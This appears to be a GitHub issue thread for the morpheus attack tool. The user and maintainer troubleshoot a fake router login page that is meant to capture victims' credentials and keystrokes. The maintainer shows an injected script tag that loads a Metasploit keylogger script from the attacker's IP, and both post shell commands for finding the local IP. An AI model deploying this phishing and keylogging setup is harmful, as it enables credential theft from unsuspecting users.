### ISSUE TITLE
Modem/router login webpage not working perfectly

### ISSUE THREAD

**Issue by spiritedwolf** [r00t-3xp10it/morpheus#2]
Now i am testing it in,
OS:-BackBox 4.5
Metasploit path:- /opt/metasploit  [I've installed it manually, community version]

![screenshot - 12252016 - 10 32 34 am](https://cloud.githubusercontent.com/assets/18477824/21471847/40958bb2-ca8e-11e6-92ab-0eba9bdba83b.png)

So now in Backbox it showing me router login page but not capturing credentials/keystroke[s].

**Comment by r00t-3xp10it** [comment]
<br />

From that screenshot i can see that your metasploit does not have
connected to the link inside index.html (router login fake webpage)

<br />

> This is what appens when metasploit connects to the link (javascript) inside index.html
![poc1](https://dl.dropboxusercontent.com/u/21426454/ww2.png)

<br />

# Possible causes
1º - Edit **var/www/html/index.html** and check if the follow line its present:
`<script type='text/javascript' src='http://192.168.1.3:8080/support/test.js'></script></body>`
If that line its present in index.html it means that you have not loaded proper the webpage
and the metasploit server **did not have recive the connection form client** (url link)...

<br />

2º - Another possible cause its my script store your ip addr with one '**empty space**' into variable:
`<script type='text/javascript' src='http://192.168.1.3  :8080/support/test.js'></script></body>`
If exists an empty space in the javascript tag then it means that morpheus funtion that stores
your ip addr its bad writen, replace that value (**backbox**) then:
![poc1](https://dl.dropboxusercontent.com/u/21426454/ww3.png)
> "**And report back to me what is the new backbox configuration**".

<br />


3º - Another possible cause its that you must **wait for the msfconsole to load**
before trying to access any domain (domains with .com) in target browser.

<br /><br />

> HINT: only when metasploit identifies the '**client**' it can start recording keystrokes...
![poc2](https://dl.dropboxusercontent.com/u/21426454/ww1.png)

<br />

**Comment by spiritedwolf** [comment]
Well you are right, the problem is with 2nd one. [Blank spaces]
![screenshot - 12252016 - 10 10 30 pm](https://cloud.githubusercontent.com/assets/18477824/21474758/59cf86e2-caf1-11e6-87b5-b93166efca24.png)

And i just find one way but its not properly showing me plane text.
![screenshot - 12252016 - 10 25 59 pm](https://cloud.githubusercontent.com/assets/18477824/21474736/410984e6-caf1-11e6-9030-41f2326a6e4c.png)

So any suggestion's?

Edit:- Done you can use this:-

ifconfig | grep "inet " | grep -Fv 127.0.0.1 | awk '{print $2}' | cut -d ':' -f2

for BackBox.
![screenshot - 12252016 - 10 49 22 pm](https://cloud.githubusercontent.com/assets/18477824/21475010/82343f80-caf4-11e6-9c2e-13a2f1606a51.png)

**Comment by r00t-3xp10it** [comment]
I see now  (backbox ifconfig conf), and i can tell you that the rigth bash command is:

`ifconfig $InT3R | egrep -w 'inet' | awk {'print $2'} | cut -d ':'  -f2`

Its the same conf that ubuntu uses, so replace the backbox command by ubuntu.

**Comment by spiritedwolf** [comment]
No its not working i think:-
![screenshot - 12262016 - 02 45 54 pm](https://cloud.githubusercontent.com/assets/18477824/21479401/1a38b4fc-cb7a-11e6-8f0b-1e50415a1786.png)

we should use this[Ubuntu Linux command is not working]:-
`ifconfig | grep "inet " | grep -Fv 127.0.0.1 | awk '{print $2}' | cut -d ':' -f2`
![screenshot - 12262016 - 02 47 57 pm](https://cloud.githubusercontent.com/assets/18477824/21479425/588e6f44-cb7a-11e6-8107-c4aab629ff7d.png)

Also i have check it 
`ifconfig | grep "inet " | grep -Fv 127.0.0.1 | awk '{print $2}' | cut -d ':' -f2` 

It working:-
![screenshot - 12252016 - 11 01 08 pm](https://cloud.githubusercontent.com/assets/18477824/21479446/9174c5ba-cb7a-11e6-9d93-49e062320b03.png)


So don't use ubuntu configuration for backbox, it's  " yosemite 10.10 mac command".

**Comment by r00t-3xp10it** [comment]
l
oooool so you dont have any clue what $InT3R is rigth???
let me show you:

InT3R=`netstat -r | grep "default" | awk {'print $8'}`
IP=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'} | cut -d ':' -f2`
echo "iam using interface: $InT3R and my IP is: $IP"

**Comment by spiritedwolf** [comment]
ohh ok :/

**Comment by spiritedwolf** [comment]
ohh ok, i get it.
